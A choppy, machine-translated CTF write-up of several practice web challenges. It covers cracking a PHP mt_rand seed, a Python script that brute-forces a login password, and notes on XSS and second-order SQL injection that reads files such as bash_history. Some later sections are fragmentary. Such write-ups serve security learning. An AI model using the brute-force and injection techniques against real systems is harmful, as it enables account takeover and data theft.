Article Directory
[GWCTF 2019] A boring lottery
Open the topic is this stuff
View the source code! ! ! Find the key webpage and open it! !
The following is the code audit link
<?php
#这不是抽奖程序的源代码!不许看!
header("Content-Type: text/html;charset=utf-8");
session_start();
if(!isset($_SESSION['seed'])){
$_SESSION['seed']=rand(0,999999999);
}
mt_srand($_SESSION['seed']);
$str_long1 = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
$str='';
$len1=20;
for ( $i = 0; $i < $len1; $i++ ){
$str.=substr($str_long1, mt_rand(0, strlen($str_long1) - 1), 1);
}
$str_show = substr($str, 0, 10);
echo "<p id='p1'>".$str_show."</p>";
if(isset($_POST['num'])){
if($_POST['num']===$str){
x
echo "<p id=flag>抽奖,就是那么枯燥且无味,给你flag{xxxxxxxxx}</p>";
}
else{
echo "<p id=flag>没抽中哦,再试试吧</p>";
}
}
show_source("check.php");
Use php's pseudo-random blasting, use python script
str1 = 'abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'
str2 = 'zXGgRbXiep'
str3 = str1[::-1]
length = len(str2)
res = ''
for i in range(len(str2)):
for j in range(len(str1)):
if str2[i] == str1[j]:
res += str(j) + ' ' + str(j) + ' ' + '0' + ' ' + str(len(str1) - 1) + ' '
break
print(res)
Next, use the php pseudo-random number blasting tool to
bring the result in to get the flag
<?php
mt_srand(948663066);
$str_long1 = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
$str='';
$len1=20;
for ( $i = 0; $i < $len1; $i++ ){
$str.=substr($str_long1, mt_rand(0, strlen($str_long1) - 1), 1);
}
echo "<p id='p1'>".$str."</p>";
[网鼎杯2018]Comment
First, you have to log in to leave a message. Look at the prompt of the login box. I probably know that I need to use burp, but I like python to
hang my brother’s spicy chicken script.
import requests
import time
session = requests.session()
for i in range(999):
data = {
'username': 'zhangwei',
'password': f'zhangwei{i}'
}
r = session.post('http://89a6083e-7291-41f2-b946-fc56ecd543c1.node3.buuoj.cn/login.php', data=data)
print(i)
time.sleep(0.2)
if 'username or password error' not in r.text:
print(r.text)
print(data)
Get the password here zhangwei666
, then log in.
First test whether it is sql injection, obviously not.
Then try whether it is XSS
, ah, this really succeeded. Hehe I
tried to play the cookie and failed.
I saw something good in the console hahaha and I didn’t at all. I will do this. After reading other people’s blogs, I know that I need to restore files. git log --reflog
View all branch records
A secondary injection problem
. I don’t know why there is no echo
for regular injection. If the user knows that the user has root privileges, the flag will not be in the database (because if it is in the database, root privileges are not required). SQL injection can be used to read local filesload_file()
There is a www user to
view bash_history: save the historical commands used by the current user, easy to find
. I
saw that he deleted the .DS_Store file under /home/www/ . Since the target environment is docker, the .DS_Store file should be in /tmp/html in. In the .DS_Store file, there are often some invisible characters, which can be converted to hexadecimal using the hex function.
[BJDCTF 2nd]elementmaster
Found this after request? ? ? Hexadecimal show
It is speculated from here that it is a chemical element.
Find a script on the Internet hhh
import requests
url='http://86512ce4-2a07-43e0-a9f6-edabc83ec7d5.node3.buuoj.cn/'
flag=''
element=['H', 'He', 'Li', 'Be', 'B', 'C', 'N', 'O', 'F', 'Ne', 'Na', 'Mg', 'Al', 'Si', 'P', 'S', 'Cl', 'Ar',
'K', 'Ca', 'Sc', 'Ti', 'V', 'Cr', 'Mn', 'Fe', 'Co', 'Ni', 'Cu', 'Zn', 'Ga', 'Ge', 'As', 'Se', 'Br',
'Kr', 'Rb', 'Sr', 'Y', 'Zr', 'Nb', 'Mo', 'Te', 'Ru', 'Rh', 'Pd', 'Ag', 'Cd', 'In', 'Sn', 'Sb', 'Te',
'I', 'Xe', 'Cs', 'Ba', 'La', 'Ce', 'Pr', 'Nd', 'Pm', 'Sm', 'Eu', 'Gd', 'Tb', 'Dy', 'Ho', 'Er', 'Tm',
'Yb', 'Lu', 'Hf', 'Ta', 'W', 'Re', 'Os', 'Ir', 'Pt', 'Au', 'Hg', 'Tl', 'Pb', 'Bi', 'Po', 'At', 'Rn',
'Fr', 'Ra', 'Ac', 'Th', 'Pa', 'U', 'Np', 'Pu', 'Am', 'Cm', 'Bk', 'Cf', 'Es', 'Fm','Md', 'No', 'Lr',
'Rf', 'Db', 'Sg', 'Bh', 'Hs', 'Mt', 'Ds', 'Rg', 'Cn', 'Nh', 'Fl', 'Mc', 'Lv', 'Ts', 'Og', 'Uue']
for i in element:
r=requests.get(url+i+'.php')
if r.status_code == 200:
flag+=r.text
print (flag)
Get the result And_th3_3LemEnt5_w1LL_De5tR0y_y0u.php
Visit to get the flag
[MRCTF2020] Matryoshka
?b%20u%20p%20t=23333%0a
First come an anti-encryption code
[HCTF 2018]WarmUp
CVE-2018-12613
Reference article
The difference between git reset plus or not --hard
i Spring and Autumn This article is written very well
using PHP's string parsing feature Bypass